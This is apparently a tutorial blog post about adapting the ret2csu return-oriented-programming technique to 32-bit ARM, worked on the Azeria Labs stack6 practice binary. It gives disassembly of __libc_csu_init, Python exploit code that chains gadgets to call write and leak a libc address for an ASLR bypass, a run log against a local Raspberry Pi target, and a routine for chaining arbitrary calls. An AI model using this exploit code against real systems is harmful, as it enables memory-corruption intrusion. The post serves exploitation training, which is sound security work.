Introduction

In this post I’ll show you how to port the ret2csu technique to ARM binaries. This technique allows a full ASLR bypass using only ROP gadgets found inside the binary itself. We will also see that it is a very effective way to chain ROP gadgets.

Background

My recent interest in ARM exploitation led me to the Azeria Labs tutorials on ARM assembly and ARM exploitation. They are really great for beginners, teaching the basics of memory corruption vulnerabilities, how to exploit them, how to write ARM shellcode, and the basics of how to exploit stack and heap corruption vulnerabilities. There are also stack overflow challenges to practice with the environment, the tools, and very basic exploitation techniques. The goal of the last challenge, called stack6, is:

Get control over PC and execute your shellcode using techniques like ret2libc or ROP

The solution is very straightforward and the tutorials give you everything you need to apply ret2libc (also called ret2zp - return to zero protection - on ARM).
The goal of ret2libc is to reuse libc code to eventually execute

system("/bin/sh\x00");

and get a shell. The generalization of this technique is ROP - Return Oriented Programming. As an exercise, I exploited the same stack6 challenge with a ROP chain in order to:

  1. call mprotect to set the stack as executable
  2. jump to my shellcode and get a shell.
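
For step 1, mprotect requires a page-aligned start address, so the arguments cannot simply be the raw address of the shellcode. The following is a minimal sketch of how the three arguments could be computed, assuming 4 KiB pages; the helper name mprotect_args and the stack address are hypothetical and only serve the illustration.

```python
PAGE_SIZE = 0x1000                                # assumption: 4 KiB pages
PROT_READ, PROT_WRITE, PROT_EXEC = 0x1, 0x2, 0x4  # Linux protection flags

def mprotect_args(addr, length=PAGE_SIZE, page_size=PAGE_SIZE):
    """Return (start, size, prot) covering [addr, addr + length) with whole pages."""
    start = addr & ~(page_size - 1)                           # round down
    end = (addr + length + page_size - 1) & ~(page_size - 1)  # round up
    return start, end - start, PROT_READ | PROT_WRITE | PROT_EXEC

# Hypothetical address of the shellcode on the stack.
r0, r1, r2 = mprotect_args(0xbefff6a4, length=0x100)
print(hex(r0), hex(r1), r2)
```

The three returned values are what would have to end up in r0, r1 and r2 before branching to mprotect.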

While practicing with ROP on ARM, I realized that it’s not so straightforward to chain ROP gadgets. This article does a really good job of explaining how to do it, and I regret not finding it before banging my head against the problem and working it out by myself.

So far so good; let me recap what I learned from the tutorials and from some exercises I did, leveraging my knowledge of x86_64 exploitation:

  • ARM assembly and shellcoding
  • Basic stack overflow exploitation (no protections)
  • ret2libc (or ret2zp) technique (NX protection bypass)
  • very basic ROP exploitation (NX protection bypass)

What if there are more protections? Is ASLR turned on? If yes, is there a way to leak a libc pointer without relying on the program behaviour? Can I use ROP to call functions with more than one parameter?
As a matter of fact it turns out that there is no easy answer to all those questions. At least, I wasn’t able to find answers online.

So I decided to investigate how __libc_csu_init works on Linux and whether it’s possible to abuse it as we do on x86_64 binaries.

Before we start

I will not cover the basics here: I’m assuming you know advanced stack exploitation techniques on x86_64 and have a basic understanding of ARM assembly and its calling convention.

ret2csu

If you get the stack6 executable and disassemble it, you can find the code of __libc_csu_init:

00010584 <__libc_csu_init>:
   10584:       e92d43f8        push    {r3, r4, r5, r6, r7, r8, r9, lr}
   10588:       e1a07000        mov     r7, r0
   1058c:       e59f604c        ldr     r6, [pc, #76]   ; 105e0 <__libc_csu_init+0x5c>
   10590:       e59f504c        ldr     r5, [pc, #76]   ; 105e4 <__libc_csu_init+0x60>
   10594:       e08f6006        add     r6, pc, r6
   10598:       e08f5005        add     r5, pc, r5
   1059c:       e0656006        rsb     r6, r5, r6
   105a0:       e1a08001        mov     r8, r1
   105a4:       e1a09002        mov     r9, r2
   105a8:       ebffff63        bl      1033c <_init>
   105ac:       e1b06146        asrs    r6, r6, #2
   105b0:       08bd83f8        popeq   {r3, r4, r5, r6, r7, r8, r9, pc}
   105b4:       e2455004        sub     r5, r5, #4
   105b8:       e3a04000        mov     r4, #0
   105bc:       e2844001        add     r4, r4, #1
   105c0:       e5b53004        ldr     r3, [r5, #4]!
   105c4:       e1a00007        mov     r0, r7
   105c8:       e1a01008        mov     r1, r8
   105cc:       e1a02009        mov     r2, r9
   105d0:       e12fff33        blx     r3
   105d4:       e1540006        cmp     r4, r6
   105d8:       1afffff7        bne     105bc <__libc_csu_init+0x38>
   105dc:       e8bd83f8        pop     {r3, r4, r5, r6, r7, r8, r9, pc}
   105e0:       0001009c        muleq   r1, ip, r0
   105e4:       00010094        muleq   r1, r4, r0

We can see that there are two interesting gadgets, right? Let’s start analyzing the gadget at 0x105dc:

   105dc:       e8bd83f8        pop     {r3, r4, r5, r6, r7, r8, r9, pc}

This gadget lets us load r3 through r9 and pc from the stack. On its own, only pc helps us call a function, because arguments are passed in r0-r3 and the gadget leaves r0, r1 and r2 untouched.

But there is another gadget at 0x105c4 which, if combined with the previous one, becomes pretty interesting:

   105c4:       e1a00007        mov     r0, r7
   105c8:       e1a01008        mov     r1, r8
   105cc:       e1a02009        mov     r2, r9
   105d0:       e12fff33        blx     r3

Notice how r7, r8 and r9 are moved into r0, r1 and r2 respectively. Those three registers contain the first three parameters of a function.
The gadget ends by branching (with link and exchange) to the address written inside r3 (which we also control).

By combining these two gadgets we can arbitrarily call a function with up to three parameters:

  1. Fill r0, r1 and r2 with the three parameters (by way of r7, r8 and r9)
  2. Fill r3 with the address of the function
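
The two steps above can be modeled with a toy simulation of the two gadgets. This is only a sketch: registers are a dict, the stack is a list of words, and FUNC is a hypothetical function address.

```python
MOV_AND_BLX = 0x105c4
FUNC = 0x00012340  # hypothetical address of the function to call

def pop_many(regs, stack):
    """pop {r3, r4, r5, r6, r7, r8, r9, pc}: lowest register gets the first word."""
    for name in ("r3", "r4", "r5", "r6", "r7", "r8", "r9", "pc"):
        regs[name] = stack.pop(0)

def mov_and_blx(regs):
    """mov r0, r7; mov r1, r8; mov r2, r9; blx r3."""
    regs["r0"], regs["r1"], regs["r2"] = regs["r7"], regs["r8"], regs["r9"]
    regs["lr"] = 0x105d4   # address of the instruction following blx
    regs["pc"] = regs["r3"]

# Words as they would sit on the stack right after the overwritten return address.
stack = [FUNC, 0xAA, 0xBB, 0xCC, 0x1, 0x2, 0x3, MOV_AND_BLX]
regs = {}
pop_many(regs, stack)     # the pop loads pc with MOV_AND_BLX
mov_and_blx(regs)         # so this gadget runs next
print({k: hex(regs[k]) for k in ("r0", "r1", "r2", "pc", "lr")})
```

After both gadgets have run, r0, r1 and r2 hold the three arguments and pc holds the function address.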

Let’s see how this works with the following Python code:

...
pop_many = p32(0x105dc)
mov_and_blx = p32(0x000105c4)

def ret2csu(r0, r1, r2, call):
	payload = b""
	payload += pop_many
	payload += p32(call)    #r3
	payload += p32(0xAA)    #r4
	payload += p32(0xBB)    #r5
	payload += p32(0xCC)    #r6
	payload += p32(r0)      #r7 -> r0
	payload += p32(r1)      #r8 -> r1
	payload += p32(r2)      #r9 -> r2
	payload += mov_and_blx  #pc
	return payload

EIP_OFFSET = 0xYY

payload = b""
payload += b"A"*EIP_OFFSET
payload += ret2csu(0x1, elf.got['write'], 0x4, elf.symbols['write'])

p.sendline(payload)
p.recvline() 

leak = u32(p.recv(4))
log.success("Leaked: {}".format(hex(leak)))

gbyolo@kalimero: bof [master]× » python exploit_ret2csu.py
[*] '/opt/shared/asm/arm/bof/elf'
    Arch:     arm-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x10000)
    RWX:      Has RWX segments
[+] Connecting to 127.0.0.1 on port 5022: Done
[*] pi@127.0.0.1:
    Distro    Raspbian 10
    OS:       linux
    Arch:     Unknown
    Version:  4.19.50
    ASLR:     Enabled
    Note:     Susceptible to ASLR ulimit trick (CVE-2016-3672)
[+] Starting remote process b'/home/pi/arm/elf' on 127.0.0.1: pid 447
[+] Leaked: 0xb6e14430

We successfully called write and leaked a libc pointer without relying on the program behaviour itself: as long as the binary is not PIE (as is the case here) and contains __libc_csu_init, ret2csu works whatever the program does.
This enables a full ASLR bypass, so a second stage payload can just execute system, execve, or whatever else you like.
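
Turning the leak into usable addresses is plain arithmetic: subtract the offset of the leaked symbol to get the libc base, then add the offset of the function you want. The sketch below assumes the leaked value is the runtime address of write. Both offsets are made up for illustration; real ones have to be read from the target’s libc.

```python
PAGE_SIZE = 0x1000  # assumption: 4 KiB pages

def libc_base_from_leak(leaked_addr, symbol_offset):
    """Compute the libc load address from one leaked symbol address."""
    base = leaked_addr - symbol_offset
    if base % PAGE_SIZE:
        # A base that is not page-aligned usually means wrong libc or offset.
        raise ValueError("libc base is not page-aligned")
    return base

# HYPOTHETICAL offsets, not taken from any real libc build.
WRITE_OFFSET = 0x000c3430
SYSTEM_OFFSET = 0x00037154

leak = 0xb6e14430  # value printed by the run above
base = libc_base_from_leak(leak, WRITE_OFFSET)
system_addr = base + SYSTEM_OFFSET
print(hex(base), hex(system_addr))
```

The page-alignment check is a cheap sanity test that catches a mismatched libc before the second stage is sent.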

Arbitrary ROP chaining

If you look carefully at the ROP gadgets we used, you will notice that they can be chained in a circular way, which lets us chain arbitrary function calls much like in x86_64 ROP.

Let’s call POP_MANY the gadget at 0x105dc and MOV_AND_BLX the gadget at 0x105c4. The ret2csu attack consists of executing POP_MANY first and then MOV_AND_BLX.

   105c4:       e1a00007        mov     r0, r7
   105c8:       e1a01008        mov     r1, r8
   105cc:       e1a02009        mov     r2, r9
   105d0:       e12fff33        blx     r3
   105d4:       e1540006        cmp     r4, r6
   105d8:       1afffff7        bne     105bc <__libc_csu_init+0x38>
   105dc:       e8bd83f8        pop     {r3, r4, r5, r6, r7, r8, r9, pc}

The last instruction of MOV_AND_BLX is our function call, made with the ARM blx instruction, which saves the address of the next instruction (i.e. 0x105d4) in the link register (lr) before actually jumping. In this way, when the function returns, execution resumes in this part of __libc_csu_init:

   105d4:       e1540006        cmp     r4, r6
   105d8:       1afffff7        bne     105bc <__libc_csu_init+0x38>
   105dc:       e8bd83f8        pop     {r3, r4, r5, r6, r7, r8, r9, pc}

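The registers r4 and r6 are compared: if they differ, execution loops back to 0x105bc; if they are equal, it falls through to POP_MANY, so we can still redirect the execution flow. Can we control r4 and r6 such that they contain the same value after blx r3? Of course! We executed the POP_MANY gadget before in order to fill r7, r8 and r9 (and therefore r0, r1 and r2), but it also filled r4, r5 and r6 with junk values. Since r4 to r11 are callee-saved in the ARM calling convention, a well-behaved function returns with them unchanged, so we only need to put the same value in r4 and r6.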
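
The decision taken by those three instructions can be written down as a tiny model. This is only a sketch of the cmp/bne pair, with the addresses taken from the disassembly above; the function name after_return is hypothetical.

```python
LOOP_BODY = 0x105bc  # add r4, r4, #1 ... loops and calls through [r5, #4]! again
POP_MANY = 0x105dc   # pop {r3, r4, r5, r6, r7, r8, r9, pc}

def after_return(r4, r6):
    """Model of: cmp r4, r6; bne 105bc; otherwise fall through to 105dc."""
    return LOOP_BODY if r4 != r6 else POP_MANY

print(hex(after_return(0xAA, 0xCC)))  # junk values from the first version
print(hex(after_return(0x0, 0x0)))    # equal values
```

With the junk values 0xAA and 0xCC the branch is taken and control goes back into the loop; with equal values execution reaches the pop and the next eight words on the stack are consumed.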

The updated ret2csu function is the following:

def ret2csu(r0, r1, r2, call, chain=False):
	payload = b""
	if not chain:
		payload += pop_many
	payload += p32(call)    #r3
	payload += p32(0x0)     #r4
	payload += p32(0x0)     #r5
	payload += p32(0x0)     #r6. Set equal to r4
	payload += p32(r0)      #r7 -> r0
	payload += p32(r1)      #r8 -> r1
	payload += p32(r2)      #r9 -> r2
	payload += mov_and_blx  #pc
	return payload

We can now build a ROP chain like this:

payload += ret2csu(0x1, elf.got['write'], 0x4, elf.symbols['write'])
payload += ret2csu(0, 0, 0, elf.symbols['main'], chain=True)
payload += ret2csu(...)
payload += ret2csu(...)

This lets us call as many functions as we want, each with up to three arguments.
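
To check the layout of such a chain without a target, the payload can be built with the standard library and replayed word by word. This is a sketch only: p32 here is a struct-based stand-in for the pwntools helper, walk is a hypothetical checker, and WRITE_PLT, WRITE_GOT and MAIN are made-up addresses standing in for elf.symbols[...] and elf.got[...].

```python
import struct

POP_MANY = 0x105dc
MOV_AND_BLX = 0x105c4

def p32(value):
    """Pack a 32-bit little-endian word (stand-in for pwntools' p32)."""
    return struct.pack("<I", value)

def ret2csu(r0, r1, r2, call, chain=False):
    words = [] if chain else [POP_MANY]
    words += [call, 0, 0, 0, r0, r1, r2, MOV_AND_BLX]  # r3..r9, pc
    return b"".join(p32(w) for w in words)

def walk(payload):
    """Replay the chain and return the (function, r0, r1, r2) calls it makes."""
    words = list(struct.unpack("<%dI" % (len(payload) // 4), payload))
    assert words.pop(0) == POP_MANY            # overwritten return address
    calls = []
    while len(words) >= 8:
        r3, r4, r5, r6, r7, r8, r9, pc = words[:8]
        del words[:8]
        assert pc == MOV_AND_BLX and r4 == r6  # needed to reach the pop again
        calls.append((r3, r7, r8, r9))
    return calls

# HYPOTHETICAL addresses, for illustration only.
WRITE_PLT, WRITE_GOT, MAIN = 0x10370, 0x2101c, 0x104e0

payload = ret2csu(0x1, WRITE_GOT, 0x4, WRITE_PLT)
payload += ret2csu(0, 0, 0, MAIN, chain=True)
for func, a, b, c in walk(payload):
    print(hex(func), hex(a), hex(b), hex(c))
```

Each chained call costs eight words on the stack, which is worth keeping in mind when the overflow has a size limit.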